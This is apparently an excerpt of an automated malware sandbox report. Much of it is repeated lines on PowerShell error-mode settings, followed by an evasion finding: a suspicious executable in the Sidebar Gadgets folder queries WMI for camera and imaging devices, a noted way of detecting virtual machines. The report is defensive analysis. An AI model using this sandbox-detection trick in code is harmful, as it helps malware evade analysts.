                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
